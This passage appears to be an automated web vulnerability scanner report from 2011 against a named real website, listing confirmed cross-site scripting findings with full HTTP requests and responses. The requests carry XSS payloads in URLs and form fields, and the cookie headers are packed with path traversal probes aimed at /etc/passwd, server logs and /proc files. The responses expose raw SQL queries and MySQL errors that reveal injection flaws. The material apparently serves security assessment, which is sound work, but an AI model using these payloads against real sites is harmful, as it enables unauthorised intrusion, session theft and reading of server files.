password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST '"--></style></script><script>alert(0x0005A8)</script>

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005A8)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:26 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D1641C31AE7CCDC7EC67D3555B88723B; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?'"--></style></script><script>alert(0x0005AD..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005AD)</script>

Request

GET /ppc/leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6kd4ubr2r05co19gef4gu3f565; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005AB)%3C/script%3E

/ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005AB)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005AB)</script>

Request

GET /ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005AB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9dptjbub0krssdt1q4j8865dr3; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?'"--></style></script><script>alert(0x000597..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x000597)</script>

Request

GET /ppc/leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jrklj2ve9rcrtavahr2pa1eps2; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000597)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/

/ppc/leadflow/meac00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/?'"--></style></script><script>alert(0x0005B0)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005B0)</script>

Request

GET /ppc/leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ltp9ablnu5olmjoi6encr9gq84; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005AE)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/lgds00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005AE)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
